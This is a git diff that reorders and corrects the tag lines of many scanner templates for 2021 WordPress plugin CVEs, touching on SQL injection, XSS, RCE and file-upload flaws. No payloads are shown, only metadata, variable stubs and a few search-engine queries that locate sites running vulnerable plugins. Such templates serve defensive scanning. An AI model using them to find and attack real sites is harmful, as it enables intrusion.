diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml
index 222318b24d..8b5ebbd63e 100644
--- a/http/cves/2021/CVE-2021-24274.yaml
+++ b/http/cves/2021/CVE-2021-24274.yaml
@@ -26,7 +26,7 @@ info:
vendor: supsystic
product: ultimate_maps
framework: wordpress
- tags: wpscan,packetstorm,wordpress,cve,cve2021,wp-plugin,maps,supsystic
+ tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,maps,supsystic
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml
index 71c5903c12..6cdf8503fe 100644
--- a/http/cves/2021/CVE-2021-24275.yaml
+++ b/http/cves/2021/CVE-2021-24275.yaml
@@ -26,7 +26,7 @@ info:
vendor: supsystic
product: popup
framework: wordpress
- tags: wpscan,packetstorm,wordpress,cve,cve2021,wp-plugin,supsystic
+ tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,supsystic
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml
index 2b63b0e3cb..59ad10e65f 100644
--- a/http/cves/2021/CVE-2021-24276.yaml
+++ b/http/cves/2021/CVE-2021-24276.yaml
@@ -26,7 +26,7 @@ info:
vendor: supsystic
product: contact_form
framework: wordpress
- tags: wordpress,cve,cve2021,wp-plugin,wpscan,packetstorm,supsystic
+ tags: cve2021,cve,wordpress,wp-plugin,wpscan,packetstorm,supsystic
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml
index a9b9797f0e..164d703920 100644
--- a/http/cves/2021/CVE-2021-24278.yaml
+++ b/http/cves/2021/CVE-2021-24278.yaml
@@ -26,7 +26,7 @@ info:
vendor: querysol
product: redirection_for_contact_form_7
framework: wordpress
- tags: wordpress,wp-plugin,wpscan,cve,cve2021,querysol
+ tags: cve2021,cve,wordpress,wp-plugin,wpscan,querysol
http:
- method: POST
diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml
index f869a9c83e..938bf1969d 100644
--- a/http/cves/2021/CVE-2021-24284.yaml
+++ b/http/cves/2021/CVE-2021-24284.yaml
@@ -30,7 +30,7 @@ info:
vendor: kaswara_project
product: kaswara
framework: wordpress
- tags: intrusive,unauth,fileupload,wpscan,cve,wordpress,wp-plugin,rce,cve2021,wp,kaswara_project
+ tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project
variables:
zip_file: "{{to_lower(rand_text_alpha(6))}}"
php_file: "{{to_lower(rand_text_alpha(2))}}.php"
diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml
index 68bd1eb3d1..0e394f8436 100644
--- a/http/cves/2021/CVE-2021-24285.yaml
+++ b/http/cves/2021/CVE-2021-24285.yaml
@@ -26,7 +26,7 @@ info:
vendor: cars-seller-auto-classifieds-script_project
product: cars-seller-auto-classifieds-script
framework: wordpress
- tags: cve2021,wordpress,wp-plugin,sqli,wpscan,cve,cars-seller-auto-classifieds-script_project
+ tags: cve2021,cve,wordpress,wp-plugin,sqli,wpscan,cars-seller-auto-classifieds-script_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24286.yaml b/http/cves/2021/CVE-2021-24286.yaml
index e1a5ab347f..d1a55505eb 100644
--- a/http/cves/2021/CVE-2021-24286.yaml
+++ b/http/cves/2021/CVE-2021-24286.yaml
@@ -26,7 +26,7 @@ info:
vendor: mooveagency
product: redirect_404_to_parent
framework: wordpress
- tags: xss,cve,cve2023,wordpress,wpscan,authenticated,exploitdb,wp-plugin,mooveagency
+ tags: cve2021,cve,xss,wordpress,wpscan,authenticated,exploitdb,wp-plugin,mooveagency
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml
index 9f911f4459..623a70c613 100644
--- a/http/cves/2021/CVE-2021-24287.yaml
+++ b/http/cves/2021/CVE-2021-24287.yaml
@@ -28,7 +28,7 @@ info:
vendor: mooveagency
product: select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons
framework: wordpress
- tags: wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,cve2021,xss,wp-plugin,cve,wordpress,edb,mooveagency
+ tags: cve2021,cve,wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,xss,wp-plugin,wordpress,edb,mooveagency
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml
index df6c9a38f9..c409c34be1 100644
--- a/http/cves/2021/CVE-2021-24288.yaml
+++ b/http/cves/2021/CVE-2021-24288.yaml
@@ -25,7 +25,7 @@ info:
vendor: acymailing
product: acymailing
framework: wordpress
- tags: wpscan,wordpress,cve,cve2021,redirect,wp-plugin,acymailing
+ tags: cve,cve2021,wpscan,wordpress,redirect,wp-plugin,acymailing
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml
index 13f83867b2..177391e269 100644
--- a/http/cves/2021/CVE-2021-24291.yaml
+++ b/http/cves/2021/CVE-2021-24291.yaml
@@ -27,7 +27,7 @@ info:
vendor: 10web
product: photo_gallery
framework: wordpress
- tags: photo,wpscan,packetstorm,cve,cve2021,xss,wordpress,wp-plugin,10web
+ tags: cve2021,cve,photo,wpscan,packetstorm,xss,wordpress,wp-plugin,10web
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml
index f9dc597841..330b05b7e1 100644
--- a/http/cves/2021/CVE-2021-24298.yaml
+++ b/http/cves/2021/CVE-2021-24298.yaml
@@ -27,7 +27,7 @@ info:
vendor: ibenic
product: simple_giveaways
framework: wordpress
- tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,ibenic
+ tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,ibenic
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml
index 52b07314a1..b996140710 100644
--- a/http/cves/2021/CVE-2021-24300.yaml
+++ b/http/cves/2021/CVE-2021-24300.yaml
@@ -25,7 +25,7 @@ info:
vendor: pickplugins
product: product_slider_for_woocommerce
framework: wordpress
- tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan,pickplugins
+ tags: cve2021,cve,xss,wp,wordpress,wp-plugin,authenticated,wpscan,pickplugins
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml
index 2f3c738033..6819369083 100644
--- a/http/cves/2021/CVE-2021-24316.yaml
+++ b/http/cves/2021/CVE-2021-24316.yaml
@@ -27,7 +27,7 @@ info:
vendor: wowthemes
product: mediumish
framework: wordpress
- tags: cve,cve2021,mediumish,xss,wordpress,wpscan,intrusive,wowthemes
+ tags: cve2021,cve,mediumish,xss,wordpress,wpscan,intrusive,wowthemes
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml
index 1d344c9c7b..4c49b4fab7 100644
--- a/http/cves/2021/CVE-2021-24320.yaml
+++ b/http/cves/2021/CVE-2021-24320.yaml
@@ -26,7 +26,7 @@ info:
vendor: bold-themes
product: bello
framework: wordpress
- tags: cve2021,wordpress,xss,wp-plugin,wpscan,cve,bold-themes
+ tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,bold-themes
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml
index 62650cc0db..f85a538bc6 100644
--- a/http/cves/2021/CVE-2021-24335.yaml
+++ b/http/cves/2021/CVE-2021-24335.yaml
@@ -28,7 +28,7 @@ info:
vendor: smartdatasoft
product: car_repair_services_\&_auto_mechanic
framework: wordpress
- tags: cve,cve2021,wordpress,xss,wp-plugin,wpscan,smartdatasoft
+ tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,smartdatasoft
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml
index 61333601e9..dfcf1a776e 100644
--- a/http/cves/2021/CVE-2021-24340.yaml
+++ b/http/cves/2021/CVE-2021-24340.yaml
@@ -26,7 +26,7 @@ info:
vendor: veronalabs
product: wp_statistics
framework: wordpress
- tags: cve,wp-plugin,unauth,wpscan,cve2021,wordpress,sqli,blind,edb,veronalabs
+ tags: cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml
index b84d521090..748d4586cf 100644
--- a/http/cves/2021/CVE-2021-24342.yaml
+++ b/http/cves/2021/CVE-2021-24342.yaml
@@ -25,7 +25,7 @@ info:
vendor: jnews
product: jnews
framework: wordpress
- tags: cve2021,wordpress,xss,wp-plugin,wpscan,cve,jnews
+ tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,jnews
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml
index cc0745d5e9..73ba339ae6 100644
--- a/http/cves/2021/CVE-2021-24347.yaml
+++ b/http/cves/2021/CVE-2021-24347.yaml
@@ -28,7 +28,7 @@ info:
vendor: smartypantsplugins
product: sp_project_\&_document_manager
framework: wordpress
- tags: sp-client-document-manager,wpscan,cve,wp-plugin,wp,authenticated,wordpress,cve2021,rce,packetstorm,intrusive,smartypantsplugins
+ tags: cve2021,cve,sp-client-document-manager,wpscan,wp-plugin,wp,authenticated,wordpress,rce,packetstorm,intrusive,smartypantsplugins
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml
index cd0466389e..93068cb6c4 100644
--- a/http/cves/2021/CVE-2021-24351.yaml
+++ b/http/cves/2021/CVE-2021-24351.yaml
@@ -27,7 +27,7 @@ info:
vendor: posimyth
product: the_plus_addons_for_elementor
framework: wordpress
- tags: cve2021,wordpress,wp-plugin,wp,xss,the-plus-addons-for-elementor,wpscan,cve,posimyth
+ tags: cve2021,cve,wordpress,wp-plugin,wp,xss,the-plus-addons-for-elementor,wpscan,posimyth
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml
index 6a486dc65d..df23eeefb6 100644
--- a/http/cves/2021/CVE-2021-24358.yaml
+++ b/http/cves/2021/CVE-2021-24358.yaml
@@ -26,7 +26,7 @@ info:
vendor: posimyth
product: the_plus_addons_for_elementor
framework: wordpress
- tags: wp,wpscan,cve,cve2021,wordpress,redirect,wp-plugin,elementor,posimyth
+ tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,elementor,posimyth
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml
index 260c9d490d..ec50304c80 100644
--- a/http/cves/2021/CVE-2021-24364.yaml
+++ b/http/cves/2021/CVE-2021-24364.yaml
@@ -25,7 +25,7 @@ info:
vendor: tielabs
product: jannah
framework: wordpress
- tags: cve,cve2021,wordpress,xss,wp-theme,wpscan,tielabs
+ tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml
index 2d6c7ed9b1..20f67436e0 100644
--- a/http/cves/2021/CVE-2021-24370.yaml
+++ b/http/cves/2021/CVE-2021-24370.yaml
@@ -30,7 +30,7 @@ info:
product: fancy_product_designer
framework: wordpress
google-query: inurl:“/wp-content/plugins/fancy-product-designer”
- tags: wordpress,wp,seclists,cve,wpscan,cve2021,rce,wp-plugin,fancyproduct,radykal
+ tags: cve2021,cve,wordpress,wp,seclists,wpscan,rce,wp-plugin,fancyproduct,radykal
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml
index dfa5b538f1..270509d392 100644
--- a/http/cves/2021/CVE-2021-24389.yaml
+++ b/http/cves/2021/CVE-2021-24389.yaml
@@ -25,7 +25,7 @@ info:
vendor: chimpgroup
product: foodbakery
framework: wordpress
- tags: cve,cve2021,wordpress,xss,wp-plugin,wpscan,chimpgroup
+ tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,chimpgroup
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml
index 4bade2d715..6d2bfe8558 100644
--- a/http/cves/2021/CVE-2021-24406.yaml
+++ b/http/cves/2021/CVE-2021-24406.yaml
@@ -25,7 +25,7 @@ info:
vendor: gvectors
product: wpforo_forum
framework: wordpress
- tags: wpscan,wordpress,redirect,cve,cve2021,gvectors
+ tags: cve2021,cve,wpscan,wordpress,redirect,gvectors
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml
index a755f41ec5..76e63c4b16 100644
--- a/http/cves/2021/CVE-2021-24407.yaml
+++ b/http/cves/2021/CVE-2021-24407.yaml
@@ -25,7 +25,7 @@ info:
vendor: tielabs
product: jannah
framework: wordpress
- tags: cve,cve2021,wordpress,xss,wp-theme,wpscan,tielabs
+ tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml
index a2a040a9ea..4ebebf1aca 100644
--- a/http/cves/2021/CVE-2021-24409.yaml
+++ b/http/cves/2021/CVE-2021-24409.yaml
@@ -27,7 +27,7 @@ info:
product: prismatic
framework: wordpress
publicwww-query: "/wp-content/plugins/prismatic"
- tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet
+ tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml
index 1e44c53b93..2df7980814 100644
--- a/http/cves/2021/CVE-2021-24435.yaml
+++ b/http/cves/2021/CVE-2021-24435.yaml
@@ -28,7 +28,7 @@ info:
vendor: gambit
product: titan_framework
framework: wordpress
- tags: wp,xss,wp-plugin,titan-framework,wpscan,cve,cve2021,wordpress,gambit
+ tags: cve2021,cve,wp,xss,wp-plugin,titan-framework,wpscan,wordpress,gambit
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml
index bd0a199922..be83db2ea0 100644
--- a/http/cves/2021/CVE-2021-24436.yaml
+++ b/http/cves/2021/CVE-2021-24436.yaml
@@ -28,7 +28,7 @@ info:
vendor: boldgrid
product: w3_total_cache
framework: wordpress
- tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated,boldgrid
+ tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated,boldgrid
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24452.yaml b/http/cves/2021/CVE-2021-24452.yaml
index 0354ee535b..366d0df237 100644
--- a/http/cves/2021/CVE-2021-24452.yaml
+++ b/http/cves/2021/CVE-2021-24452.yaml
@@ -27,7 +27,7 @@ info:
vendor: boldgrid
product: w3_total_cache
framework: wordpress
- tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth,boldgrid
+ tags: cve2021,cve,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,auth,boldgrid
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml
index f2107d2801..ee8196ca42 100644
--- a/http/cves/2021/CVE-2021-24472.yaml
+++ b/http/cves/2021/CVE-2021-24472.yaml
@@ -28,7 +28,7 @@ info:
product: kentharadio
framework: wordpress
publicwww-query: "/wp-content/plugins/qt-kentharadio"
- tags: wordpress,lfi,ssrf,wp,wp-plugin,wpscan,cve,cve2021,qantumthemes
+ tags: cve2021,cve,wordpress,lfi,ssrf,wp,wp-plugin,wpscan,qantumthemes
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24488.yaml b/http/cves/2021/CVE-2021-24488.yaml
index 2cd5434fef..b8f6a95676 100644
--- a/http/cves/2021/CVE-2021-24488.yaml
+++ b/http/cves/2021/CVE-2021-24488.yaml
@@ -25,7 +25,7 @@ info:
vendor: pickplugins
product: post_grid
framework: wordpress
- tags: authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin,pickplugins
+ tags: cve2021,cve,authenticated,wpscan,xss,wp,wordpress,wp-plugin,pickplugins
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml
index a4f48d5765..a6cd0bcb4d 100644
--- a/http/cves/2021/CVE-2021-24495.yaml
+++ b/http/cves/2021/CVE-2021-24495.yaml
@@ -27,7 +27,7 @@ info:
vendor: marmoset
product: marmoset_viewer
framework: wordpress
- tags: xss,wpscan,cve,cve2021,wp-plugin,wordpress,intrusive,marmoset
+ tags: cve2021,cve,xss,wpscan,wp-plugin,wordpress,intrusive,marmoset
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml
index 91205c5741..865f2cb720 100644
--- a/http/cves/2021/CVE-2021-24498.yaml
+++ b/http/cves/2021/CVE-2021-24498.yaml
@@ -25,7 +25,7 @@ info:
vendor: dwbooster
product: calendar_event_multi_view
framework: wordpress
- tags: cve,cve2021,xss,wordpress,wp-plugin,wpscan,dwbooster
+ tags: cve2021,cve,xss,wordpress,wp-plugin,wpscan,dwbooster
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml
index f0a88fe077..d4295d4304 100644
--- a/http/cves/2021/CVE-2021-24499.yaml
+++ b/http/cves/2021/CVE-2021-24499.yaml
@@ -28,7 +28,7 @@ info:
vendor: amentotech
product: workreap
framework: wordpress
- tags: wpscan,packetstorm,cve,cve2021,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech
+ tags: cve,cve2021,wpscan,packetstorm,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml
index ebfc155df4..436c2ee696 100644
--- a/http/cves/2021/CVE-2021-24510.yaml
+++ b/http/cves/2021/CVE-2021-24510.yaml
@@ -24,7 +24,7 @@ info:
max-request: 2
vendor: mf_gig_calendar_project
product: mf_gig_calendar
- tags: wp-plugin,authenticated,wpscan,wordpress,cve,cve2021,mf_gig_calendar_project
+ tags: cve2021,cve,wp-plugin,authenticated,wpscan,wordpress,mf_gig_calendar_project
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml
index a29b6f5e31..b43bc095fa 100644
--- a/http/cves/2021/CVE-2021-24554.yaml
+++ b/http/cves/2021/CVE-2021-24554.yaml
@@ -29,7 +29,7 @@ info:
vendor: freelancetoindia
product: paytm-pay
framework: wordpress
- tags: cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,cve,freelancetoindia
+ tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml
index fba52183fc..a3e390c385 100644
--- a/http/cves/2021/CVE-2021-24627.yaml
+++ b/http/cves/2021/CVE-2021-24627.yaml
@@ -25,7 +25,7 @@ info:
product: g_auto-hyperlink
framework: wordpress
publicwww-query: /wp-content/plugins/g-auto-hyperlink/
- tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project
+ tags: cve2021,cve,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project
variables:
num: 999999999
diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml
index 0f3ba9d6ce..90b6c83ffc 100644
--- a/http/cves/2021/CVE-2021-24666.yaml
+++ b/http/cves/2021/CVE-2021-24666.yaml
@@ -28,7 +28,7 @@ info:
vendor: podlove
product: podlove_podcast_publisher
framework: wordpress
- tags: cve2021,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,cve,podlove
+ tags: cve2021,cve,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,podlove
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml
index 5b36c85689..0ea5706b9f 100644
--- a/http/cves/2021/CVE-2021-24750.yaml
+++ b/http/cves/2021/CVE-2021-24750.yaml
@@ -27,7 +27,7 @@ info:
vendor: wp_visitor_statistics_\(real_time_traffic\)_project
product: wp_visitor_statistics_\(real_time_traffic\)
framework: wordpress
- tags: authenticated,wpscan,cve,cve2021,sqli,wp,wordpress,wp-plugin,wp_visitor_statistics_\(real_time_traffic\)_project
+ tags: cve2021,cve,authenticated,wpscan,sqli,wp,wordpress,wp-plugin,wp_visitor_statistics_\(real_time_traffic\)_project
variables:
num: "999999999"
diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml
index 7b928da7d8..65d74d9e50 100644
--- a/http/cves/2021/CVE-2021-24762.yaml
+++ b/http/cves/2021/CVE-2021-24762.yaml
@@ -28,7 +28,7 @@ info:
vendor: getperfectsurvey
product: perfect_survey
framework: wordpress
- tags: cve,wpscan,cve2021,sqli,wp,wordpress,wp-plugin,unauth,edb,getperfectsurvey
+ tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,unauth,edb,getperfectsurvey
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24791.yaml b/http/cves/2021/CVE-2021-24791.yaml
index 472e6b75da..ec5dcd6f18 100644
--- a/http/cves/2021/CVE-2021-24791.yaml
+++ b/http/cves/2021/CVE-2021-24791.yaml
@@ -26,7 +26,7 @@ info:
product: header_footer_code_manager
framework: wordpress
google-query: inurl:"/wp-content/plugins/wp-custom-pages/"
- tags: wpscan,cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress
+ tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml
index b8a306abf7..9a0d444832 100644
--- a/http/cves/2021/CVE-2021-24827.yaml
+++ b/http/cves/2021/CVE-2021-24827.yaml
@@ -29,7 +29,7 @@ info:
vendor: asgaros
product: asgaros_forum
framework: wordpress
- tags: cve2022,wp-plugin,asgaros-forum,unauth,wpscan,cve,wordpress,wp,sqli,asgaros
+ tags: cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml
index 55b6cce7b8..cb96315365 100644
--- a/http/cves/2021/CVE-2021-24838.yaml
+++ b/http/cves/2021/CVE-2021-24838.yaml
@@ -27,7 +27,7 @@ info:
vendor: bologer
product: anycomment
framework: wordpress
- tags: redirect,anycomment,wpscan,cve,cve2021,wordpress,wp-plugin,bologer
+ tags: cve2021,cve,redirect,anycomment,wpscan,wordpress,wp-plugin,bologer
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml
index d02993a605..4560bc2af0 100644
--- a/http/cves/2021/CVE-2021-24862.yaml
+++ b/http/cves/2021/CVE-2021-24862.yaml
@@ -28,7 +28,7 @@ info:
vendor: metagauss
product: registrationmagic
framework: wordpress
- tags: wpscan,cve,wp-plugin,cve2021,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss
+ tags: cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml
index d92154b4ed..6d97b59c8f 100644
--- a/http/cves/2021/CVE-2021-24875.yaml
+++ b/http/cves/2021/CVE-2021-24875.yaml
@@ -26,7 +26,7 @@ info:
vendor: implecode
product: ecommerce_product_catalog
framework: wordpress
- tags: wp,authenticated,wpscan,ecommerce-product-catalog,cve,cve2022,xss,wordpress,wp-plugin,implecode
+ tags: cve2021,cve,wp,authenticated,wpscan,ecommerce-product-catalog,xss,wordpress,wp-plugin,implecode
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml
index 750476f0e2..fa194f7d72 100644
--- a/http/cves/2021/CVE-2021-24891.yaml
+++ b/http/cves/2021/CVE-2021-24891.yaml
@@ -27,7 +27,7 @@ info:
vendor: elementor
product: website_builder
framework: wordpress
- tags: wordpress,wp-plugin,elementor,wpscan,cve,cve2021,dom,xss
+ tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml
index ede5481dd6..9999a987b7 100644
--- a/http/cves/2021/CVE-2021-24910.yaml
+++ b/http/cves/2021/CVE-2021-24910.yaml
@@ -28,7 +28,7 @@ info:
vendor: transposh
product: transposh_wordpress_translation
framework: wordpress
- tags: cve2021,wordpress,wp-plugin,xss,wp,wpscan,cve,transposh
+ tags: cve2021,cve,wordpress,wp-plugin,xss,wp,wpscan,transposh
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml
index 50dcb080d8..f4a3222f3e 100644
--- a/http/cves/2021/CVE-2021-24915.yaml
+++ b/http/cves/2021/CVE-2021-24915.yaml
@@ -26,7 +26,7 @@ info:
product: contest_gallery
framework: wordpress
public-query: "/wp-content/plugins/contest-gallery/"
- tags: cve,cve2021,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery
+ tags: cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml
index be004810f3..6d27663fd2 100644
--- a/http/cves/2021/CVE-2021-24917.yaml
+++ b/http/cves/2021/CVE-2021-24917.yaml
@@ -26,7 +26,7 @@ info:
vendor: wpserveur
product: wps_hide_login
framework: wordpress
- tags: cve2021,wp,wordpress,wp-plugin,unauth,wpscan,cve,wpserveur
+ tags: cve2021,cve,wp,wordpress,wp-plugin,unauth,wpscan,wpserveur
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml
index ed51f3e907..3b14c9feec 100644
--- a/http/cves/2021/CVE-2021-24926.yaml
+++ b/http/cves/2021/CVE-2021-24926.yaml
@@ -23,7 +23,7 @@ info:
vendor: domaincheckplugin
product: domain_check
framework: wordpress
- tags: wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin
+ tags: cve,cve2021,wpscan,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml
index 3b570b3b9c..61e7610a0a 100644
--- a/http/cves/2021/CVE-2021-24931.yaml
+++ b/http/cves/2021/CVE-2021-24931.yaml
@@ -28,7 +28,7 @@ info:
vendor: ays-pro
product: secure_copy_content_protection_and_content_locking
framework: wordpress
- tags: wp-plugin,cve,wp,packetstorm,unauth,wpscan,cve2021,sqli,wordpress,secure-copy-content-protection,ays-pro
+ tags: cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml
index 66f7cb7651..c2911e61a8 100644
--- a/http/cves/2021/CVE-2021-24940.yaml
+++ b/http/cves/2021/CVE-2021-24940.yaml
@@ -26,7 +26,7 @@ info:
vendor: woocommerce
product: persian-woocommerce
framework: wordpress
- tags: wp,xss,authenticated,wpscan,cve,cve2021,wordpress,wp-plugin,woocommerce
+ tags: cve2021,cve,wp,xss,authenticated,wpscan,wordpress,wp-plugin,woocommerce
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml
index c87a67a065..cddbda08b9 100644
--- a/http/cves/2021/CVE-2021-24946.yaml
+++ b/http/cves/2021/CVE-2021-24946.yaml
@@ -29,7 +29,7 @@ info:
vendor: webnus
product: modern_events_calendar_lite
framework: wordpress
- tags: cve2021,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,cve,modern-events-calendar-lite,wordpress,webnus
+ tags: cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus
http:
- raw:
diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml
index eaf1e02866..b96add2bb8 100644
--- a/http/cves/2021/CVE-2021-24947.yaml
